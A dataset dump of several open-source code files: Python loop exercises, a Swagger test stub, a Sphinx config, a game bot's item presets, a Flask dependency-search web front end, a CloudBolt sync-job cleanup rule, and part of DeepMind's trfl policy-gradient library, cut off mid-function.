| repo_name (stringlengths 5 to 92) | path (stringlengths 4 to 232) | copies (stringclasses, 19 values) | size (stringlengths 4 to 7) | content (stringlengths 721 to 1.04M) | license (stringclasses, 15 values) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51 to 99.9) | line_max (int64, 15 to 997) | alpha_frac (float64, 0.25 to 0.97) | autogenerated (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|
tri2sing/IntroPython | Loops.py | 1 | 1308 |
from sys import float_info as sfi


def square_root(n):
    '''Square root calculated using Newton's method.
    '''
    x = n / 2.0
    while True:
        y = (x + n / x) / 2
        # As equality in floating-point numbers can be elusive,
        # we check whether the numbers are close to each other.
        if abs(y - x) < sfi.epsilon:
            break
        x = y
    return x
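
# Note: Newton's method here iterates x_{k+1} = (x_k + n/x_k) / 2, which
# converges quadratically to sqrt(n).  Because `sfi.epsilon` is machine
# epsilon relative to 1.0, a relative tolerance would be more robust for
# large n -- a sketch of an alternative stopping test (not in the original):
#
#   if abs(y - x) < sfi.epsilon * max(1.0, abs(x)):
#       break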

def factorial_new(n):
    '''Factorial using a for loop.
    '''
    result = 1
    if n < 0:
        return None
    if n == 0:
        return 1
    for i in range(1, n + 1):
        result = result * i
    return result


def skipper01(end, start=0, step=1):
    for i in range(start, end, step):
        print(i, end=' ')


def skipper02(end, start=0, step=1):
    i = start
    while i < end:
        print(i, end=' ')
        i = i + step


if __name__ == "__main__":
    print("The square root of 4 = " + str(square_root(4)))
    print("The square root of 9 = " + str(square_root(9)))
    print("The square root of 15 = %.4f " % square_root(15))
    print("The factorial of 4 = " + str(factorial_new(4)))
    print("The factorial of 7 = " + str(factorial_new(7)))
    print("The factorial of 10 = %d " % factorial_new(10))
    skipper01(10, 5, 2)
    print('\n')
    skipper02(13, 3, 3)
    print('\n')
    skipper01(8)
    print('\n')
    skipper02(7)
| apache-2.0 | 8,439,470,421,023,596,000 | 24.153846 | 60 | 0.547401 | false |
ltowarek/budget-supervisor | third_party/saltedge/test/test_reconnect_session_request_body_data.py | 1 | 1050 |
# coding: utf-8

"""
    Salt Edge Account Information API

    API Reference for services  # noqa: E501

    OpenAPI spec version: 5.0.0
    Contact: [email protected]
    Generated by: https://github.com/swagger-api/swagger-codegen.git
"""

from __future__ import absolute_import

import unittest

import swagger_client
from swagger_client.models.reconnect_session_request_body_data import ReconnectSessionRequestBodyData  # noqa: E501
from swagger_client.rest import ApiException


class TestReconnectSessionRequestBodyData(unittest.TestCase):
    """ReconnectSessionRequestBodyData unit test stubs"""

    def setUp(self):
        pass

    def tearDown(self):
        pass

    def testReconnectSessionRequestBodyData(self):
        """Test ReconnectSessionRequestBodyData"""
        # FIXME: construct object with mandatory attributes with example values
        # model = swagger_client.models.reconnect_session_request_body_data.ReconnectSessionRequestBodyData()  # noqa: E501
        pass


if __name__ == '__main__':
    unittest.main()
| mit | -8,373,832,002,242,567,000 | 25.923077 | 123 | 0.724762 | false |
smartmob-project/procfile | docs/conf.py | 1 | 9607 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# procfile documentation build configuration file, created by
# sphinx-quickstart on Mon Nov 23 19:51:57 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
try:
    from sphinxcontrib import spelling
except ImportError:
    spelling = None
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.doctest',
]
# Spelling extension is not available on ReadTheDocs. It isn't needed anyways
# since this will be validated by continuous integration and only successful
# builds will be published on RTFD.
if spelling:
    extensions.append('sphinxcontrib.spelling')
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'procfile'
copyright = '2015, procfile contributors'
author = 'procfile contributors'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1.0'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'procfiledoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #'preamble': '',

    # Latex figure (float) alignment
    #'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'procfile.tex', 'procfile Documentation',
     'procfile contributors', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'procfile', 'procfile Documentation',
     [author], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'procfile', 'procfile Documentation',
     author, 'procfile', 'One line description of project.',
     'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| mit | 2,425,044,857,591,886,300 | 31.130435 | 79 | 0.709899 | false |
DavidBarishev/DDtankFarmingBot | Ddtank_farm_bot/Framework/CommonItems.py | 1 | 1198 |
"""Has presets for common items

Attributes:
    random_card (dict): Random card item
    exp_1 (dict): Exp pill lv 1
    exp_2 (dict): Exp pill lv 2
    exp_3 (dict): Exp pill lv 3
    exp_4 (dict): Exp pill lv 4
"""
import Items
import Inventory
from Util import image_path_main

exp_1 = {
    "item_img": image_path_main('EXP_1'),
    "function": Items.ItemFunctions.Open_Empty,
    "index_of_function": 1,
    "section": Inventory.InventorySections.Items
}

exp_2 = {
    "item_img": image_path_main('EXP_2'),
    "function": Items.ItemFunctions.Open_Empty,
    "index_of_function": 1,
    "section": Inventory.InventorySections.Items
}

exp_3 = {
    "item_img": image_path_main('EXP_3'),
    "function": Items.ItemFunctions.Open_Empty,
    "index_of_function": 1,
    "section": Inventory.InventorySections.Items
}

exp_4 = {
    "item_img": image_path_main('EXP_4'),
    "function": Items.ItemFunctions.Open_Empty,
    "index_of_function": 1,
    "section": Inventory.InventorySections.Items
}

random_card = {
    "item_img": image_path_main('Card'),
    "function": Items.ItemFunctions.Batch_Empty_Preferred,
    "index_of_function": 1,
    "section": Inventory.InventorySections.Items
}
| gpl-3.0 | -3,529,443,610,802,917,400 | 23.958333 | 58 | 0.657763 | false |
fginter/dep_search_serve | serve_depsearch.py | 1 | 6001 |
#!/usr/bin/env python3
# This code can run in both Python 2.7+ and 3.3+

import cgi

from flask import Flask, Markup
import flask
import json
import requests
import six
import six.moves.urllib as urllib  # use six for python 2.x compatibility
import traceback

DEBUGMODE = False

try:
    from config_local import *  # use to override the constants above if you like
except ImportError:
    pass  # no config_local

app = Flask("dep_search_webgui")


def yield_trees(src):
    current_tree = []
    current_comment = []
    current_context = u""
    for line in src:
        if line.startswith(u"# visual-style"):
            current_tree.append(line)
        elif line.startswith(u"# URL:"):
            current_comment.append(Markup(u'<a href="{link}">{link}</a>'.format(link=line.split(u":", 1)[1].strip())))
        elif line.startswith(u"# context-hit"):
            current_context += u' <b>{sent}</b>'.format(sent=flask.escape(line.split(u":", 1)[1].strip()))
        elif line.startswith(u"# context"):
            current_context += u' {sent}'.format(sent=flask.escape(line.split(u":", 1)[1].strip()))
        elif line.startswith(u"# hittoken"):
            current_tree.append(line)
        elif not line.startswith(u"#"):
            current_tree.append(line)
            if line == u"":
                current_comment.append(Markup(current_context))
                yield u"\n".join(current_tree), current_comment
                current_comment = []
                current_tree = []
                current_context = u""


class Query:

    @classmethod
    def from_formdata(cls, fdata):
        query = fdata[u'query'].strip()
        hits_per_page = int(fdata[u'hits_per_page'])
        treeset = fdata[u'treeset'].strip()
        if fdata.get(u'case'):
            case_sensitive = True
        else:
            case_sensitive = False
        return cls(treeset, query, case_sensitive, hits_per_page)

    @classmethod
    def from_get_request(cls, args):
        query = args[u"search"]
        treeset = args[u"db"]
        case_sensitive = True
        hits_per_page = 10
        return cls(treeset, query, case_sensitive, hits_per_page)

    def __init__(self, treeset, query, case_sensitive, hits_per_page):
        self.treeset, self.query, self.case_sensitive, self.hits_per_page = treeset, query, case_sensitive, hits_per_page

    def query_link(self, url=u"", treeset=None):
        if treeset is None:
            treeset = self.treeset
        if six.PY2:
            return url + u"query?search={query}&db={treeset}&case_sensitive={case_sensitive}&hits_per_page={hits_per_page}".format(query=unicode(urllib.parse.quote(self.query.encode("utf-8")), "utf-8"), treeset=treeset, case_sensitive=self.case_sensitive, hits_per_page=self.hits_per_page)
        else:
            return url + u"query?search={query}&db={treeset}&case_sensitive={case_sensitive}&hits_per_page={hits_per_page}".format(query=urllib.parse.quote(self.query), treeset=treeset, case_sensitive=self.case_sensitive, hits_per_page=self.hits_per_page)

    def download_link(self, url=""):
        if six.PY2:
            return DEP_SEARCH_WEBAPI + u"?search={query}&db={treeset}&case={case_sensitive}&retmax=5000&dl".format(query=unicode(urllib.parse.quote(self.query.encode("utf-8")), "utf-8"), treeset=self.treeset, case_sensitive=self.case_sensitive)
        else:
            return DEP_SEARCH_WEBAPI + u"?search={query}&db={treeset}&case={case_sensitive}&retmax=5000&dl".format(query=urllib.parse.quote(self.query), treeset=self.treeset, case_sensitive=self.case_sensitive)


@app.route(u"/")
def index():
    r = requests.get(DEP_SEARCH_WEBAPI + u"/metadata")  # Ask about the available corpora
    metadata = json.loads(r.text)
    return flask.render_template(u"index_template.html", corpus_groups=metadata[u"corpus_groups"])


# This is what JS+AJAX call
@app.route(u'/query', methods=[u"POST"])
def query_post():
    try:
        sources = []
        q = Query.from_formdata(flask.request.form)
        r = requests.get(DEP_SEARCH_WEBAPI, params={u"db": q.treeset, u"case": q.case_sensitive, u"context": 3, u"search": q.query, u"retmax": q.hits_per_page})
        if r.text.startswith(u"# Error in query"):
            ret = flask.render_template(u"query_error.html", err=r.text)
        elif not r.text.strip():
            ret = flask.render_template(u"empty_result.html")
        else:
            lines = r.text.splitlines()
            if lines[0].startswith("# SourceStats : "):
                sources = json.loads(lines[0].split(" : ", 1)[1])
                ret = flask.render_template(u"result_tbl.html", trees=yield_trees(lines[1:]))
            else:
                ret = flask.render_template(u"result_tbl.html", trees=yield_trees(lines))
        links = ['<a href="{link}">{src}</a>'.format(link=q.query_link(treeset=src), src=src) for src in sources]
        return json.dumps({u'ret': ret, u'source_links': u' '.join(links), u'query_link': q.query_link(), u'download_link': q.download_link()})
    except:
        traceback.print_exc()


# This is what GET calls
# We return the index and prefill a script call to launch the form for us
@app.route(u'/query', methods=[u"GET"])
def query_get():
    r = requests.get(DEP_SEARCH_WEBAPI + u"/metadata")  # Ask about the available corpora
    metadata = json.loads(r.text)
    if u"db" not in flask.request.args or u"search" not in flask.request.args:
        return flask.render_template(u"get_help.html", corpus_groups=metadata[u"corpus_groups"])
    q = Query.from_get_request(flask.request.args)
    run_request = Markup(u'dsearch_simulate_form("{treeset}",he.decode("{query}"),"{case_sensitive}","{max_hits}");'.format(treeset=cgi.escape(q.treeset), query=q.query.replace(u'"', u'\\"'), case_sensitive=cgi.escape(str(q.case_sensitive)), max_hits=cgi.escape(str(q.hits_per_page))))
    return flask.render_template(u"index_template.html", corpus_groups=metadata[u"corpus_groups"], run_request=run_request)


if __name__ == u'__main__':
    app.run(debug=DEBUGMODE)

r = requests.get(DEP_SEARCH_WEBAPI + u"/metadata")  # Ask about the available corpora
metadata = json.loads(r.text)
| apache-2.0 | 5,265,060,962,744,545,000 | 43.783582 | 283 | 0.653724 | false |
CloudBoltSoftware/cloudbolt-forge | rules/find_and_delete_old_sync_jobs/find_old_sync_jobs.py | 1 | 1052 |
"""
IF Rule Action
Locate sync jobs older than the provided amount of days
"""
import os
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'

import sys
import datetime
import json

sys.path.append('/opt/cloudbolt')

from common.methods import set_progress
from utilities.logger import ThreadLogger
logger = ThreadLogger(__name__)

from jobs.models import Job

days = '{{ threshold_days_before_delete }}'


def check(job, logger, days=days, *args, **kwargs):
    delete_date = datetime.datetime.now() - datetime.timedelta(days=int(days))
    sync_jobs_total = Job.objects.filter(type="syncvms").count()
    set_progress("Total sync jobs {}".format(sync_jobs_total))
    sync_jobs = Job.objects.filter(
        type="syncvms", start_date__lt=delete_date).exclude(status="RUNNING")
    set_progress("Found {} jobs to delete".format(sync_jobs.count()))
    sync_jobs_ids = list(sync_jobs.values_list('id', flat=True))
    return ("SUCCESS", "", "", {'sync_jobs': sync_jobs_ids})


if __name__ == '__main__':
    days_arg = sys.argv[1]
    # `check` takes `job` and `logger` as positional parameters, so pass the
    # module-level logger explicitly when running from the command line.
    check(job=None, logger=logger, days=days_arg)
| apache-2.0 | -2,208,363,094,936,291,800 | 32.935484 | 104 | 0.695817 | false |
deepmind/trfl | trfl/policy_gradient_ops.py | 1 | 16797 |
# Copyright 2018 The trfl Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""TensorFlow ops for continuous-action Policy Gradient algorithms."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
# Dependency imports
from six.moves import zip
import tensorflow.compat.v1 as tf
import tree as nest
from trfl import base_ops
from trfl import value_ops
PolicyEntropyExtra = collections.namedtuple("policy_entropy_extra", ["entropy"])
SequenceA2CExtra = collections.namedtuple(
    "sequence_a2c_extra", ["entropy", "entropy_loss", "baseline_loss",
                           "policy_gradient_loss", "advantages",
                           "discounted_returns"])
def policy_gradient(policies, actions, action_values, policy_vars=None,
                    name="policy_gradient"):
  """Computes policy gradient losses for a batch of trajectories.

  See `policy_gradient_loss` for more information on expected inputs and usage.

  Args:
    policies: A distribution over a batch supporting a `log_prob` method, e.g.
        an instance of `tfp.distributions.Distribution`. For example, for
        a diagonal gaussian policy:
        `policies = tfp.distributions.MultivariateNormalDiag(mus, sigmas)`
    actions: An action batch Tensor used as the argument for `log_prob`. Has
        shape equal to the batch shape of the policies concatenated with the
        event shape of the policies (which may be scalar, in which case
        concatenation leaves shape just equal to batch shape).
    action_values: A Tensor containing estimates of the values of the `actions`.
        Has shape equal to the batch shape of the policies.
    policy_vars: An optional iterable of Tensors used by `policies`. If provided
        is used in scope checks. For the multivariate normal example above this
        would be `[mus, sigmas]`.
    name: Customises the name_scope for this op.

  Returns:
    loss: Tensor with same shape as `actions` containing the total loss for each
        element in the batch. Differentiable w.r.t the variables in `policies`
        only.
  """
  policy_vars = list(policy_vars) if policy_vars else list()
  with tf.name_scope(values=policy_vars + [actions, action_values], name=name):
    actions = tf.stop_gradient(actions)
    action_values = tf.stop_gradient(action_values)
    log_prob_actions = policies.log_prob(actions)
    # Prevent accidental broadcasting if possible at construction time.
    action_values.get_shape().assert_is_compatible_with(
        log_prob_actions.get_shape())
    return -tf.multiply(log_prob_actions, action_values)
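
# A minimal usage sketch for `policy_gradient` (illustrative only: it assumes
# tensorflow_probability is importable as `tfp` and that `mus`, `sigmas`,
# `actions` and `action_values` are tensors with the shapes documented above):
#
#   policies = tfp.distributions.MultivariateNormalDiag(mus, sigmas)
#   loss = policy_gradient(policies, actions, action_values,
#                          policy_vars=[mus, sigmas])
#   # `loss` has the batch shape of `policies`; reduce it (e.g. with
#   # tf.reduce_mean) before handing it to an optimizer.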
def policy_gradient_loss(policies, actions, action_values, policy_vars=None,
                         name="policy_gradient_loss"):
  """Computes policy gradient losses for a batch of trajectories.

  This wraps `policy_gradient` to accept a possibly nested array of `policies`
  and `actions` in order to allow for multiple action distribution types or
  independent multivariate distributions if not directly available. It also sums
  up losses along the time dimension, and is more restrictive about shapes,
  assuming a [T, B] layout for the `batch_shape` of the policies and a
  concatenate(`[T, B]`, `event_shape` of the policies) shape for the actions.

  Args:
    policies: A (possibly nested structure of) distribution(s) supporting
        `batch_shape` and `event_shape` properties along with a `log_prob`
        method (e.g. an instance of `tfp.distributions.Distribution`),
        with `batch_shape` equal to `[T, B]`.
    actions: A (possibly nested structure of) N-D Tensor(s) with shape
        `[T, B, ...]` where the final dimensions are the `event_shape` of the
        corresponding distribution in the nested structure (the shape can be
        just `[T, B]` if the `event_shape` is scalar).
    action_values: Tensor of shape `[T, B]` containing an estimate of the value
        of the selected `actions`.
    policy_vars: An optional (possibly nested structure of) iterable(s) of
        Tensors used by `policies`. If provided is used in scope checks.
    name: Customises the name_scope for this op.

  Returns:
    loss: Tensor of shape `[B]` containing the total loss for each sequence
        in the batch. Differentiable w.r.t `policy_logits` only.
  """
  actions = nest.flatten(actions)
  if policy_vars:
    policy_vars = nest.flatten_up_to(policies, policy_vars)
  else:
    policy_vars = [list()] * len(actions)
  policies = nest.flatten(policies)

  # Check happens after flatten so that we can be more flexible on nest
  # structures. This is equivalent to asserting that `len(policies) ==
  # len(actions)`, which is sufficient for what we're doing here.
  nest.assert_same_structure(policies, actions)

  for policies_, actions_ in zip(policies, actions):
    policies_.batch_shape.assert_has_rank(2)
    actions_.get_shape().assert_is_compatible_with(
        policies_.batch_shape.concatenate(policies_.event_shape))

  scoped_values = policy_vars + actions + [action_values]
  with tf.name_scope(name, values=scoped_values):
    # Loss for the policy gradient. Doesn't push additional gradients through
    # the action_values.
    policy_gradient_loss_sequence = tf.add_n([
        policy_gradient(policies_, actions_, action_values, pvars)
        for policies_, actions_, pvars in zip(policies, actions, policy_vars)])

    return tf.reduce_sum(
        policy_gradient_loss_sequence, axis=[0],
        name="policy_gradient_loss")
def policy_entropy_loss(policies,
                        policy_vars=None,
                        scale_op=None,
                        name="policy_entropy_loss"):
  """Calculates entropy 'loss' for policies represented by distributions.

  Given a (possibly nested structure of) batch(es) of policies, this
  calculates the total entropy and corrects the sign so that minimizing the
  resulting loss op is equivalent to increasing entropy in the batch.

  This function accepts a nested structure of `policies` in order to allow for
  multiple distribution types or for multiple action dimensions in the case
  where there is no corresponding multivariate form available for a given
  univariate distribution. In this case, the loss is `sum_i(H(p_i, p_i))`
  where `p_i` are members of the `policies` nest. It can be shown that this is
  equivalent to calculating the entropy loss on the Cartesian product space
  over all the action dimensions, if the sampled actions are independent.

  The entropy loss is optionally scaled by some function of the policies.
  E.g. for Categorical distributions there exists such a scaling which maps
  the entropy loss into the range `[-1, 0]` in order to make it invariant to
  the size of the action space - specifically one can divide the loss by
  `sum_i(log(A_i))` where `A_i` is the number of categories in the i'th
  Categorical distribution in the `policies` nest.

  Args:
    policies: A (possibly nested structure of) batch distribution(s)
        supporting an `entropy` method that returns an N-D Tensor with shape
        equal to the `batch_shape` of the distribution, e.g. an instance of
        `tfp.distributions.Distribution`.
    policy_vars: An optional (possibly nested structure of) iterable(s) of
        Tensors used by `policies`. If provided is used in scope checks.
    scale_op: An optional op that takes `policies` as its only argument and
        returns a scalar Tensor that is used to scale the entropy loss.
        E.g. for Diag(sigma) Gaussian policies dividing by the number of
        dimensions makes entropy loss invariant to the action space dimension.
    name: Optional, name of this op.

  Returns:
    A namedtuple with fields:

    * `loss`: a tensor containing the batch of losses, shape `[B1, B2, ...]`.
    * `extra`: a namedtuple with fields:
        * `entropy`: entropy of the policy, shape `[B1, B2, ...]`.

    where [B1, B2, ... ] == policy.batch_shape
  """
  flat_policy_vars = nest.flatten(policy_vars) if policy_vars else list()
  with tf.name_scope(name, values=flat_policy_vars):
    # We want a value that we can minimize along with other losses, and where
    # minimizing means driving the policy towards a uniform distribution over
    # the actions. We thus scale it by negative one so that it can be simply
    # added to other losses.
    scale = tf.constant(-1.0, dtype=tf.float32)
    if scale_op:
      scale *= scale_op(policies)

    policies = nest.flatten(policies)
    entropy = tf.add_n(
        [policy.entropy() for policy in policies], name="entropy")
    loss = tf.multiply(scale, entropy, name="entropy_loss")
    return base_ops.LossOutput(loss, PolicyEntropyExtra(entropy))
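
# Example of a `scale_op` of the kind described in the docstring above -- a
# sketch that assumes every member of the `policies` nest is a Categorical,
# so dividing by sum_i(log(A_i)) maps the loss into [-1, 0]:
#
#   def categorical_scale_op(policies):
#     num_actions = [tf.cast(tf.shape(p.logits)[-1], tf.float32)
#                    for p in nest.flatten(policies)]
#     return 1. / tf.add_n([tf.log(a) for a in num_actions])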
def sequence_a2c_loss(policies,
                      baseline_values,
                      actions,
                      rewards,
                      pcontinues,
                      bootstrap_value,
                      policy_vars=None,
                      lambda_=1,
                      entropy_cost=None,
                      baseline_cost=1,
                      entropy_scale_op=None,
                      name="SequenceA2CLoss"):
  """Constructs a TensorFlow graph computing the A2C/GAE loss for sequences.

  This loss jointly learns the policy and the baseline. Therefore, gradients
  for this loss flow through each tensor in `policies` and through each tensor
  in `baseline_values`, but no other input tensors. The policy is learnt with
  the advantage actor-critic loss, plus an optional entropy term. The baseline
  is regressed towards the n-step bootstrapped returns given by the
  reward/pcontinue sequence. The `baseline_cost` parameter scales the
  gradients w.r.t the baseline relative to the policy gradient, i.e.
  `d(loss) / d(baseline) = baseline_cost * (n_step_return - baseline)`.

  This function is designed for batches of sequences of data. Tensors are
  assumed to be time major (i.e. the outermost dimension is time, the second
  outermost dimension is the batch dimension). We denote the sequence length in
  the shapes of the arguments with the variable `T`, the batch size with the
  variable `B`, neither of which needs to be known at construction time. Index
  `0` of the time dimension is assumed to be the start of the sequence.

  `rewards` and `pcontinues` are the sequences of data taken directly from the
  environment, possibly modulated by a discount. `baseline_values` are the
  sequences of (typically learnt) estimates of the values of the states
  visited along a batch of trajectories as observed by the agent given the
  sequences of one or more actions sampled from `policies`.

  The sequences in the tensors should be aligned such that an agent in a state
  with value `V` that takes an action `a` transitions into another state
  with value `V'`, receiving reward `r` and pcontinue `p`. Then `V`, `a`, `r`
  and `p` are all at the same index `i` in the corresponding tensors. `V'` is
  at index `i+1`, or in the `bootstrap_value` tensor if `i == T`.

  For n-dimensional action vectors, a multivariate distribution must be used
  for `policies`. In case there is no multivariate version for the desired
  univariate distribution, or in case the `actions` object is a nested
  structure (e.g. for multiple action types), this function also accepts a
  nested structure of `policies`. In this case, the loss is given by
  `sum_i(loss(p_i, a_i))` where `p_i` are members of the `policies` nest, and
  `a_i` are members of the `actions` nest. We assume that a single baseline is
  used across all action dimensions for each timestep.

  Args:
    policies: A (possibly nested structure of) distribution(s) supporting
        `batch_shape` and `event_shape` properties & `log_prob` and `entropy`
        methods (e.g. an instance of `tfp.distributions.Distribution`),
        with `batch_shape` equal to `[T, B]`. E.g. for a (non-nested) diagonal
        multivariate gaussian with dimension `A` this would be:
        `policies = tfp.distributions.MultivariateNormalDiag(mus, sigmas)`
        where `mus` and `sigmas` have shape `[T, B, A]`.
    baseline_values: 2-D Tensor containing an estimate of the state value with
        shape `[T, B]`.
    actions: A (possibly nested structure of) N-D Tensor(s) with shape
        `[T, B, ...]` where the final dimensions are the `event_shape` of the
        corresponding distribution in the nested structure (the shape can be
        just `[T, B]` if the `event_shape` is scalar).
    rewards: 2-D Tensor with shape `[T, B]`.
    pcontinues: 2-D Tensor with shape `[T, B]`.
    bootstrap_value: 1-D Tensor with shape `[B]`.
    policy_vars: An optional (possibly nested structure of) iterables of
        Tensors used by `policies`. If provided is used in scope checks. For
        the multivariate normal example above this would be `[mus, sigmas]`.
    lambda_: an optional scalar or 2-D Tensor with shape `[T, B]` for
        Generalised Advantage Estimation as per
        https://arxiv.org/abs/1506.02438.
    entropy_cost: optional scalar cost that pushes the policy to have high
        entropy, larger values cause higher entropies.
    baseline_cost: scalar cost that scales the derivatives of the baseline
        relative to the policy gradient.
    entropy_scale_op: An optional op that takes `policies` as its only
        argument and returns a scalar Tensor that is used to scale the entropy
        loss. E.g. for Diag(sigma) Gaussian policies dividing by the number of
        dimensions makes entropy loss invariant to the action space dimension.
        See `policy_entropy_loss` for more info.
    name: Customises the name_scope for this op.

  Returns:
    A namedtuple with fields:

    * `loss`: a tensor containing the total loss, shape `[B]`.
    * `extra`: a namedtuple with fields:
        * `entropy`: total loss per sequence, shape `[B]`.
        * `entropy_loss`: scaled entropy loss per sequence, shape `[B]`.
        * `baseline_loss`: scaled baseline loss per sequence, shape `[B]`.
        * `policy_gradient_loss`: policy gradient loss per sequence,
            shape `[B]`.
        * `advantages`: advantage estimates per timestep, shape `[T, B]`.
        * `discounted_returns`: discounted returns per timestep,
            shape `[T, B]`.
  """
  flat_policy_vars = nest.flatten(policy_vars) if policy_vars else list()
  scoped_values = (flat_policy_vars + nest.flatten(actions) +
                   [baseline_values, rewards, pcontinues, bootstrap_value])
  with tf.name_scope(name, values=scoped_values):
    # Loss for the baseline, summed over the time dimension.
    baseline_loss_td, td_lambda = value_ops.td_lambda(
        baseline_values, rewards, pcontinues, bootstrap_value, lambda_)

    # The TD error provides an estimate of the advantages of the actions.
